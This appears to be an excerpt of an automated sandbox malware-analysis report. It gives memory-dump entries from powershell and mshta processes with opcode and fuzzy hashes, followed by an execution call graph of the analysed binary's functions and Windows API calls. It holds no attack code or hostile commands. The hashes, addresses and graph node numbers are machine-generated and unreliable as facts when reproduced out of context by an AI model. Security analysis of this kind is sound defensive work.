                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: /S^
                                                                                                                                                                                                                                      • API String ID: 0-1735012625
                                                                                                                                                                                                                                      • Opcode ID: d93727c7e34d574bdddb246dee9e198fcde7a703980b348b7be8fed6197a60ff
                                                                                                                                                                                                                                      • Instruction ID: 2589572e17c27cbaea3305191c5b96a146723e3b944a25ce412b68a622ab55f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93727c7e34d574bdddb246dee9e198fcde7a703980b348b7be8fed6197a60ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF319377B0D7D24FE3674BB868760A87FA0EF5362074A01FBC4C58B4A3E41618078765
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5f594d6b8853f9707bbfbd275b483eb90b26d2acfacaf77ce61f301908c3efcd
                                                                                                                                                                                                                                      • Instruction ID: 41d6a9143634b08faf379904a7b6da7c197e17cc1a27f7213ad8116de9a7ad1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f594d6b8853f9707bbfbd275b483eb90b26d2acfacaf77ce61f301908c3efcd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8322822B0E7C60FE7669B7858259B47FE1EF56624B8901FBD08DC70D3D918AC09C396
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c6406afb17310796f71a4c3a1d95a1f123cf8f98bbdb3d56058c2605e58905a0
                                                                                                                                                                                                                                      • Instruction ID: 9d7d3a5b28aa7910c7d598cd67aa7503eba57a849154eb5e5a843f196ec57d6c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6406afb17310796f71a4c3a1d95a1f123cf8f98bbdb3d56058c2605e58905a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAD13932B0EBCA0FEBA5EFA868655B57BA0EF46710B4801FED05DC70D3D918A809C355
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fbeb42baebd59b61def939edf4ba6a8173ee105b9f542a2e74edbb0f0b96e870
                                                                                                                                                                                                                                      • Instruction ID: 62fd203b7262ad629dfdc57aaa0cb3733ea020efa8290c1752aebaa937fce530
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbeb42baebd59b61def939edf4ba6a8173ee105b9f542a2e74edbb0f0b96e870
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B310671A1CB484FDB189B5CDC466B97BE0FB99310F00426FE449D3292CA70B856CBC2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c5e49e2cf7fbcd83e328f86a3abe3bc0a0b6add40544ac34c8239ec3fde932f0
                                                                                                                                                                                                                                      • Instruction ID: a9030f1633afc84936f1b6e02336a82db55d86a5923b3188c9db72c166ef60e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5e49e2cf7fbcd83e328f86a3abe3bc0a0b6add40544ac34c8239ec3fde932f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B21D422B4EAC70FE7B5DE68446197866C2EF547147D921BAD04DC31E2DE18AC088349
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d7d486b3e8cb9b58163fad89264b137bb4a4b4c98a9495f7ec067f62dd8b531f
                                                                                                                                                                                                                                      • Instruction ID: ba05188af662782edf538ab8910faffa0a0bc60e60829cd1a04d7e5008ae36c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7d486b3e8cb9b58163fad89264b137bb4a4b4c98a9495f7ec067f62dd8b531f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D511E332F0E5C60FE7B5EE6854789B47BD2EF01A24BC911FAD09DC7096E919AC088345
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1946176642.00007FFD98B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98B1D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98b1d000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                                                                                                      • Instruction ID: 9c0e9408a1dff8f61d8a322dca6f4dea372fe6bccb9cff7f4c49214ff08a8762
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B014F3160CE088F9AA8EF1DE48595237E0FB98321710065AD41EC755AD731F891CBC5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                      • Instruction ID: b03a4346f22c50042c3e3a543cd057065c0f21f4a9650730cdfb5a1887b4614f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2701A73120CB0C4FD744EF0CE051AA5B3E0FB85320F10052EE58AC3691DA32E882CB46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7cd4a35e7127d5f5baf46144615dc5e6a211a4a51542be74970840f29657bc91
• Instruction ID: 8586bcc3108c90a655bed744f041c5c99615412c5513799a09c0374666f08bb1
• Opcode Fuzzy Hash: 7cd4a35e7127d5f5baf46144615dc5e6a211a4a51542be74970840f29657bc91
• Instruction Fuzzy Hash: 9CE01A35804A4C8FCB54EF18C8598E97BA0FB68201B01429BE81DC7121DB729958CBC2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
Similarity
• API ID:
• String ID: N_^6$N_^<$N_^F$N_^I$N_^J
• API String ID: 0-4116931533
• Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
• Instruction ID: 9ccd26a9974aed0b8c04a07ac9087a9ae32d7d0be93a8dad7808aa221081ab97
• Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
• Instruction Fuzzy Hash: 4021F167B084665FD30277EDBC209D8A780DB9437674802B3D368CB543D914709B8BCA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
Similarity
• API ID:
• String ID: N_^$N_^$N_^$N_^$N_^
• API String ID: 0-1162251571
• Opcode ID: fabe0376f1128ec4eb520b6a8ae85e6c3b314c430e84815edeea17b3bb8dac87
• Instruction ID: bc6809a7dcb282276c473df08714feeb7456a5e390c5869b2df9c73f6ad729d0
• Opcode Fuzzy Hash: fabe0376f1128ec4eb520b6a8ae85e6c3b314c430e84815edeea17b3bb8dac87
• Instruction Fuzzy Hash: E831B5A3E0E6CA1FE7275BB85C750D93FD0EF22608B0A00F7D5948A093FD292407820B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
Similarity
• API ID:
• String ID: N_^$N_^$N_^$N_^
• API String ID: 0-3900292545
• Opcode ID: 59de52242f84f6dd98716c2ac6004c00a094ef74341dcc058ea40de1106d6b02
• Instruction ID: ea78967cc3d05942fb6338a4f1477e7e5fe1c9cba041673b5e04e1c4da1caf2a
• Opcode Fuzzy Hash: 59de52242f84f6dd98716c2ac6004c00a094ef74341dcc058ea40de1106d6b02
• Instruction Fuzzy Hash: 664183A2A0E6C64FE32757794C7A199BFA0EF62318B4A41F7C0999F0D3EE1914078357
Memory Dump Source
• Source File: 0000000B.00000003.1773774556.000002C8DC510000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002C8DC510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_3_2c8dc510000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction ID: 3ba90de908cade9da4b1356683db2a294dfaaae7ade45a542dd755bc57e96eed
• Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction Fuzzy Hash: 719002084A580655E41411A10D4E65C655073C8190FD48580951790184D84D02971352
Memory Dump Source
• Source File: 0000002A.00000002.1924229527.00007FFD98D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd98d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a34ec4737735dd4f1b495e27a7f7e8e596db393084c71361410ae80cfe3d26b3
• Instruction ID: 7295b8c8e4a1775cc89165e87479394148af65bcc76f80fd228da2d28de0eae8
• Opcode Fuzzy Hash: a34ec4737735dd4f1b495e27a7f7e8e596db393084c71361410ae80cfe3d26b3
• Instruction Fuzzy Hash: BF325722B0DBC90FEBAA9B6858615B57FE1DF46611B4811FFD09DC71D3DE08A80AC345
Memory Dump Source
• Source File: 0000002A.00000002.1922892323.00007FFD98C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd98c40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f2b8a5f9ad153f807c9050d211c8548660b49a23fd0da1b954eddc8d8937c16
• Instruction ID: 46fc2c5fa89b4b326e888a0be0b1e775bbaf6f8cf51c159562ee69f84a6c87d9
• Opcode Fuzzy Hash: 8f2b8a5f9ad153f807c9050d211c8548660b49a23fd0da1b954eddc8d8937c16
• Instruction Fuzzy Hash: 8361F531E09A4C5FDB54DFACD8656ECBBF1EF4A310F5441AED049D7292CA35A842CB40
Memory Dump Source
• Source File: 0000002A.00000002.1924229527.00007FFD98D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd98d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09091f22f07d9f24994d87aa4363dd5e122e76606218555609dc2aa4873ec426
• Instruction ID: 97656dff81d638345f6b590863dcbf7ef6621690180ffe0356beb5ae086e4df7
• Opcode Fuzzy Hash: 09091f22f07d9f24994d87aa4363dd5e122e76606218555609dc2aa4873ec426
• Instruction Fuzzy Hash: 9E210333B0DA590FEBB9A69C68256B873D0EF54B21B9811BBD05DC3093DD19AC0A83C5
Memory Dump Source
• Source File: 0000002A.00000002.1922892323.00007FFD98C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd98c40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction ID: 2048e8d23d6adaae327089f70b499e6805f99f0127ceaea11169a6f95f713a49
• Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: 8E01677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3695D636E881CB46

Execution Graph

Execution Coverage: 7.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.5%
Total number of Nodes: 1180
Total number of Limit Nodes: 37
execution_graph (rendered call graph; the node/edge listing is not reproduced here): nodes 38244-39591 correspond to functions at 7ff69a3e1168 through 7ff69a449d4c in the sample.

Windows API calls resolved in the graph: CreateFileW, SetFileTime, SetFilePointer, ReadFile, WriteFile, GetStdHandle, GetFileType, CloseHandle, FindFirstFileW, FindNextFileW, FindClose, GetCurrentDirectoryW, GetSystemDirectoryW, GetLastError, SetLastError, CryptAcquireContextW, CryptGenRandom, CryptReleaseContext, QueryPerformanceCounter, GetSystemTime, SystemTimeToFileTime, LoadLibraryExW, FreeLibrary, GetModuleHandleW, GetProcAddress, GetProcAddressForCaller, GetCurrentProcess, GetCurrentProcessId, GetProcessAffinityMask, TerminateProcess, CreateEventW, SetErrorMode, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlPcToFileHeader, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, CompareStringW, CharUpperW, CharLowerW, CharToOemA, WideCharToMultiByte, wcschr, setbuf, fflush.

C/C++ runtime internals resolved in the graph: _CxxThrowException, _UnwindNestedFrames, std::bad_alloc::bad_alloc, __scrt_fastfail, __report_securityfailure, __BuildCatchObjectHelper, _Init_thread_footer, __isa_available_init, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_is_nonwritable_in_current_image, __vcrt_initialize_pure_virtual_call_handler, __vcrt_initialize_winapi_thunks, IsInExceptionSpec.
39455->39420 39457 7ff69a4465bc GetStdHandle GetFileType 39456->39457 39457->39452 39460 7ff69a43b020 pre_c_initialization 39459->39460 39480 7ff69a442b00 39460->39480 39462 7ff69a43b02c pre_c_initialization 39486 7ff69a43aad8 39462->39486 39464 7ff69a43b045 39465 7ff69a43b049 _RTC_Initialize 39464->39465 39466 7ff69a43b0b5 39464->39466 39491 7ff69a43ace0 39465->39491 39523 7ff69a43b52c 7 API calls __scrt_fastfail 39466->39523 39468 7ff69a43b0bf 39524 7ff69a43b52c 7 API calls __scrt_fastfail 39468->39524 39470 7ff69a43b05a pre_c_initialization 39494 7ff69a443b0c 39470->39494 39472 7ff69a43b0ca __scrt_initialize_default_local_stdio_options 39472->39361 39475 7ff69a43b06a 39522 7ff69a43b7dc RtlInitializeSListHead 39475->39522 39477 7ff69a43b06f pre_c_initialization 39478 7ff69a444818 pre_c_initialization 35 API calls 39477->39478 39479 7ff69a43b09a pre_c_initialization 39478->39479 39479->39361 39481 7ff69a442b11 39480->39481 39482 7ff69a442b19 39481->39482 39525 7ff69a444f3c 15 API calls abort 39481->39525 39482->39462 39484 7ff69a442b28 39526 7ff69a444e1c 31 API calls _invalid_parameter_noinfo 39484->39526 39487 7ff69a43ab96 39486->39487 39490 7ff69a43aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 39486->39490 39527 7ff69a43b52c 7 API calls __scrt_fastfail 39487->39527 39489 7ff69a43aba0 39490->39464 39528 7ff69a43ac90 39491->39528 39493 7ff69a43ace9 39493->39470 39495 7ff69a443b2a 39494->39495 39496 7ff69a443b40 39494->39496 39533 7ff69a444f3c 15 API calls abort 39495->39533 39535 7ff69a449370 39496->39535 39500 7ff69a443b2f 39534 7ff69a444e1c 31 API calls _invalid_parameter_noinfo 39500->39534 39502 7ff69a443b72 39539 7ff69a4438ec 35 API calls pre_c_initialization 39502->39539 39503 7ff69a43b066 39503->39468 39503->39475 39505 7ff69a443b9c 39540 7ff69a443aa8 15 API calls 2 library calls 39505->39540 39507 7ff69a443bb2 39508 7ff69a443bcb 39507->39508 39509 7ff69a443bba 39507->39509 39542 7ff69a4438ec 35 API calls pre_c_initialization 39508->39542 
39541 7ff69a444f3c 15 API calls abort 39509->39541 39512 7ff69a443bbf 39513 7ff69a444a74 __vcrt_freefls 15 API calls 39512->39513 39513->39503 39514 7ff69a443be7 39514->39512 39515 7ff69a443c17 39514->39515 39517 7ff69a443c30 39514->39517 39543 7ff69a444a74 39515->39543 39519 7ff69a444a74 __vcrt_freefls 15 API calls 39517->39519 39518 7ff69a443c20 39520 7ff69a444a74 __vcrt_freefls 15 API calls 39518->39520 39519->39512 39521 7ff69a443c2c 39520->39521 39521->39503 39523->39468 39524->39472 39525->39484 39526->39482 39527->39489 39529 7ff69a43acbf 39528->39529 39531 7ff69a43acb5 _onexit 39528->39531 39532 7ff69a444434 34 API calls _onexit 39529->39532 39531->39493 39532->39531 39533->39500 39534->39503 39536 7ff69a44937d 39535->39536 39537 7ff69a443b45 GetModuleFileNameA 39535->39537 39549 7ff69a4491b0 48 API calls 5 library calls 39536->39549 39537->39502 39539->39505 39540->39507 39541->39512 39542->39514 39544 7ff69a444a79 RtlFreeHeap 39543->39544 39545 7ff69a444aa9 __vcrt_freefls 39543->39545 39544->39545 39546 7ff69a444a94 39544->39546 39545->39518 39550 7ff69a444f3c 15 API calls abort 39546->39550 39548 7ff69a444a99 GetLastError 39548->39545 39549->39537 39550->39548 39552 7ff69a443c98 39551->39552 39556 7ff69a443ca1 39551->39556 39552->39556 39557 7ff69a443ccc 39552->39557 39556->39364 39558 7ff69a443caa 39557->39558 39559 7ff69a443ce5 39557->39559 39558->39556 39569 7ff69a443e78 17 API calls 2 library calls 39558->39569 39560 7ff69a449370 pre_c_initialization 48 API calls 39559->39560 39561 7ff69a443cea 39560->39561 39570 7ff69a44978c GetEnvironmentStringsW 39561->39570 39564 7ff69a443cf7 39566 7ff69a444a74 __vcrt_freefls 15 API calls 39564->39566 39566->39558 39567 7ff69a443d04 39568 7ff69a444a74 __vcrt_freefls 15 API calls 39567->39568 39568->39564 39569->39556 39571 7ff69a4497ba WideCharToMultiByte 39570->39571 39572 7ff69a44985e 39570->39572 39571->39572 39576 7ff69a449814 39571->39576 39574 7ff69a449868 FreeEnvironmentStringsW 39572->39574 39575 
7ff69a443cef 39572->39575 39574->39575 39575->39564 39582 7ff69a443d38 31 API calls 4 library calls 39575->39582 39583 7ff69a444ab4 39576->39583 39579 7ff69a44984b 39581 7ff69a444a74 __vcrt_freefls 15 API calls 39579->39581 39580 7ff69a449824 WideCharToMultiByte 39580->39579 39581->39572 39582->39567 39584 7ff69a444aff 39583->39584 39588 7ff69a444ac3 __vcrt_getptd_noexit 39583->39588 39590 7ff69a444f3c 15 API calls abort 39584->39590 39586 7ff69a444ae6 RtlAllocateHeap 39587 7ff69a444afd 39586->39587 39586->39588 39587->39579 39587->39580 39588->39584 39588->39586 39589 7ff69a4436c0 new 2 API calls 39588->39589 39589->39588 39590->39587 39592 7ff69a42b496 GetProcAddress 39591->39592 39593 7ff69a417e45 39591->39593 39594 7ff69a42b4cb GetProcAddress 39592->39594 39595 7ff69a42b4ae 39592->39595 39596 7ff69a3f7a68 39593->39596 39594->39593 39595->39594 39597 7ff69a3f7a76 39596->39597 39617 7ff69a442ae4 39597->39617 39599 7ff69a3f7a80 39600 7ff69a442ae4 setbuf 60 API calls 39599->39600 39601 7ff69a3f7a94 39600->39601 39626 7ff69a3f7b44 GetStdHandle GetFileType 39601->39626 39604 7ff69a3f7b44 3 API calls 39605 7ff69a3f7aae 39604->39605 39606 7ff69a3f7b44 3 API calls 39605->39606 39608 7ff69a3f7abe 39606->39608 39607 7ff69a3f7b12 39616 7ff69a3fcd78 SetConsoleCtrlHandler 39607->39616 39610 7ff69a3f7aeb 39608->39610 39629 7ff69a442abc 31 API calls 2 library calls 39608->39629 39610->39607 39631 7ff69a442abc 31 API calls 2 library calls 39610->39631 39611 7ff69a3f7adf 39630 7ff69a442b40 33 API calls 3 library calls 39611->39630 39614 7ff69a3f7b06 39632 7ff69a442b40 33 API calls 3 library calls 39614->39632 39619 7ff69a442ae9 39617->39619 39618 7ff69a447ee8 39633 7ff69a444f3c 15 API calls abort 39618->39633 39619->39618 39621 7ff69a447f23 39619->39621 39635 7ff69a447d98 60 API calls 2 library calls 39621->39635 39622 7ff69a447eed 39634 7ff69a444e1c 31 API calls _invalid_parameter_noinfo 39622->39634 39625 7ff69a447ef8 39625->39599 39627 7ff69a3f7a9e 39626->39627 39628 
7ff69a3f7b61 GetConsoleMode 39626->39628 39627->39604 39628->39627 39629->39611 39630->39610 39631->39614 39632->39607 39633->39622 39634->39625 39635->39625 39636 7ff69a44231c 39637 7ff69a44238c 39636->39637 39638 7ff69a442342 GetModuleHandleW 39636->39638 39649 7ff69a446938 EnterCriticalSection 39637->39649 39638->39637 39641 7ff69a44234f 39638->39641 39640 7ff69a446998 fflush LeaveCriticalSection 39643 7ff69a442460 39640->39643 39641->39637 39650 7ff69a4424d4 GetModuleHandleExW 39641->39650 39642 7ff69a44246c 39643->39642 39645 7ff69a442488 11 API calls 39643->39645 39644 7ff69a442396 39646 7ff69a4443b8 16 API calls 39644->39646 39648 7ff69a442410 39644->39648 39645->39642 39646->39648 39648->39640 39651 7ff69a4424fe GetProcAddress 39650->39651 39652 7ff69a442525 39650->39652 39651->39652 39655 7ff69a442518 39651->39655 39653 7ff69a44252f FreeLibrary 39652->39653 39654 7ff69a442535 39652->39654 39653->39654 39654->39637 39655->39652 39656 7ff69a3e3e71 39657 7ff69a3e3e81 39656->39657 39658 7ff69a3e3e89 39656->39658 39657->39658 39667 7ff69a439a14 49 API calls 39657->39667 39660 7ff69a3e3edd 39658->39660 39661 7ff69a3e3ea3 39658->39661 39662 7ff69a43a610 _UnwindNestedFrames 8 API calls 39660->39662 39668 7ff69a40331c 48 API calls 2 library calls 39661->39668 39664 7ff69a3e3eef 39662->39664 39665 7ff69a3e3eab 39665->39660 39669 7ff69a3e63e8 8 API calls 2 library calls 39665->39669 39667->39658 39668->39665 39669->39660 39670 7ff69a42bb70 39673 7ff69a42bb80 39670->39673 39682 7ff69a42bae8 39673->39682 39675 7ff69a42bb79 39676 7ff69a42bb97 39676->39675 39687 7ff69a3f1690 39676->39687 39678 7ff69a42bbc8 SetEvent 39679 7ff69a42bbd5 LeaveCriticalSection 39678->39679 39680 7ff69a42bae8 67 API calls 39679->39680 39680->39676 39691 7ff69a42b974 WaitForSingleObject 39682->39691 39685 7ff69a42bb16 EnterCriticalSection LeaveCriticalSection 39686 7ff69a42bb12 39685->39686 39686->39676 39688 7ff69a3f16a4 39687->39688 39689 7ff69a3f16c2 EnterCriticalSection 39687->39689 
39688->39689 39699 7ff69a3f1180 39688->39699 39689->39678 39689->39679 39692 7ff69a42b986 GetLastError 39691->39692 39693 7ff69a42b9b7 39691->39693 39697 7ff69a3fca6c 48 API calls 2 library calls 39692->39697 39693->39685 39693->39686 39695 7ff69a42b9a6 39698 7ff69a3fca40 61 API calls _CxxThrowException 39695->39698 39697->39695 39698->39693 39700 7ff69a3f11ab 39699->39700 39707 7ff69a3f11b0 39699->39707 39709 7ff69a3f17c8 216 API calls 2 library calls 39700->39709 39702 7ff69a3f166a 39702->39688 39703 7ff69a416d38 216 API calls 39703->39707 39704 7ff69a3f1080 48 API calls 39704->39707 39706 7ff69a416fe8 216 API calls 39706->39707 39707->39702 39707->39703 39707->39704 39707->39706 39708 7ff69a416e90 216 API calls 39707->39708 39710 7ff69a3f17c8 216 API calls 2 library calls 39707->39710 39708->39707 39709->39707 39710->39707 39711 7ff69a3e7a5b 39712 7ff69a3e7a60 39711->39712 39713 7ff69a3f9be0 14 API calls 39712->39713 39714 7ff69a3e7af7 39712->39714 39713->39714 39715 7ff69a3e7bda 39714->39715 39744 7ff69a401e1c GetFileTime 39714->39744 39716 7ff69a3eb540 147 API calls 39715->39716 39718 7ff69a3e7bf8 39716->39718 39721 7ff69a3e7c3e 39718->39721 39745 7ff69a439b98 216 API calls 3 library calls 39718->39745 39720 7ff69a3eb540 147 API calls 39723 7ff69a3e7c9c 39720->39723 39721->39720 39722 7ff69a3e7f89 39723->39722 39746 7ff69a406378 39723->39746 39725 7ff69a3e7cd7 39726 7ff69a406378 4 API calls 39725->39726 39728 7ff69a3e7cf3 39726->39728 39727 7ff69a3e7de1 39734 7ff69a3e7e4e 39727->39734 39751 7ff69a4198dc 39727->39751 39728->39727 39729 7ff69a3e7d59 39728->39729 39730 7ff69a3e7d38 39728->39730 39733 7ff69a43a444 new 4 API calls 39729->39733 39732 7ff69a43a444 new 4 API calls 39730->39732 39738 7ff69a3e7d42 std::bad_alloc::bad_alloc 39732->39738 39733->39738 39757 7ff69a3e1204 48 API calls 39734->39757 39736 7ff69a3e7eb3 39739 7ff69a3e7edb 39736->39739 39758 7ff69a419680 39736->39758 39738->39727 39750 7ff69a43ba34 RtlPcToFileHeader RaiseException 39738->39750 
